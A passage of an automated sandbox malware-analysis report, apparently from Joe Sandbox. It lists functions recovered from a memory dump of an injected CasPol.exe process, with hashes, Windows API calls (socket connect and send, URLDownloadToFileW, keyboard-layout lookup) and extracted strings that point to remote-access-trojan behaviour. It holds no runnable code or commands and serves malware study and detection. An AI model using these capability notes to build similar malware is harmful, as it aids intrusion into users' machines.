                                                                                                                                                                          • Instruction Fuzzy Hash: 4A1142B35043446BC304FBB5CD85DEF77ACEBC4359F040A3EF64A82061EE29EA498695
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleOpenProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 39102293-0
                                                                                                                                                                          • Opcode ID: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                                                                                          • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                                                                                                                                                          • Opcode Fuzzy Hash: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2633735394-0
                                                                                                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4116985748-0
                                                                                                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1761009282-0
                                                                                                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 1000655C
                                                                                                                                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
                                                                                                                                                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                          • String ID: hQG$h}v
                                                                                                                                                                          • API String ID: 1634807452-1113060276
                                                                                                                                                                          • Opcode ID: 924d4dea02d6d252b00b23d9c21eed4fbde36b019de5c56123dbc4f299c02f77
                                                                                                                                                                          • Instruction ID: bd8839fee7d7b479886ee9dd8bc27b498e65f27a04cbeda07bab16e05f906841
                                                                                                                                                                          • Opcode Fuzzy Hash: 924d4dea02d6d252b00b23d9c21eed4fbde36b019de5c56123dbc4f299c02f77
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C5131315082419BC328FB22D851AEFB3E5AFD4348F50483FF54AA71E2EF78594AC659
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alloca_probe_16__freea
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 1635606685-2591199288
                                                                                                                                                                          • Opcode ID: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                          • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                                                                          • Opcode Fuzzy Hash: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                          • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                                                                          APIs
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                          • API String ID: 1291196975-3785015651
                                                                                                                                                                          • Opcode ID: 9b53b6ca85e1e970862b9060bab093b2d51b10dc603066e54454478e6ec1cfc5
                                                                                                                                                                          • Instruction ID: b1b0a2c635f45e8130f4767810c6fbb161559e0826da6e7acb487c9aae22ef17
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b53b6ca85e1e970862b9060bab093b2d51b10dc603066e54454478e6ec1cfc5
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                          • String ID: image/png
                                                                                                                                                                          • API String ID: 1291196975-2966254431
                                                                                                                                                                          • Opcode ID: 59aa457744364f091b6bcb9ce6af0e0968cb763baa3c3fa79ffc4f27b17189cc
                                                                                                                                                                          • Instruction ID: f628a6b37c0337dbee8ef7f798de7cbb8cc54a1da061f00231e4b0513ad08027
                                                                                                                                                                          • Opcode Fuzzy Hash: 59aa457744364f091b6bcb9ce6af0e0968cb763baa3c3fa79ffc4f27b17189cc
                                                                                                                                                                          • Instruction Fuzzy Hash: 4221C375204211AFC700AB61CC89DBFBBACEFCA314F10452EF54693251DB389945CBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                                          Strings
                                                                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                          • API String ID: 481472006-1507639952
                                                                                                                                                                          • Opcode ID: 8ec06cc165161d8c8adbfcb3abee473b515424f62eec08f026c25f94e2b42d60
                                                                                                                                                                          • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ec06cc165161d8c8adbfcb3abee473b515424f62eec08f026c25f94e2b42d60
                                                                                                                                                                          • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DownloadFileSleep
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 1931167962-604454484
                                                                                                                                                                          • Opcode ID: 8114e628eea57f2808d6efc14bab377c0a18422bda66f60f7fafba6988014c86
                                                                                                                                                                          • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                                                                                                                                                          • Opcode Fuzzy Hash: 8114e628eea57f2808d6efc14bab377c0a18422bda66f60f7fafba6988014c86
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                          • String ID: : $Se.
                                                                                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                          • API String ID: 481472006-2430845779
                                                                                                                                                                          • Opcode ID: 4366d4699f73263778e54812fb50b651df52e241bed65e6deada5bde40811a9a
                                                                                                                                                                          • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4366d4699f73263778e54812fb50b651df52e241bed65e6deada5bde40811a9a
                                                                                                                                                                          • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: alarm.wav$xYG
                                                                                                                                                                          • API String ID: 1174141254-3120134784
                                                                                                                                                                          • Opcode ID: 821df8ad2e412678609072b1e179d49ef4e6f5bd5d6652d785030614b6c5786a
                                                                                                                                                                          • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                                                                                                                                                          • Opcode Fuzzy Hash: 821df8ad2e412678609072b1e179d49ef4e6f5bd5d6652d785030614b6c5786a
                                                                                                                                                                          • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                                                                                                                                                          APIs
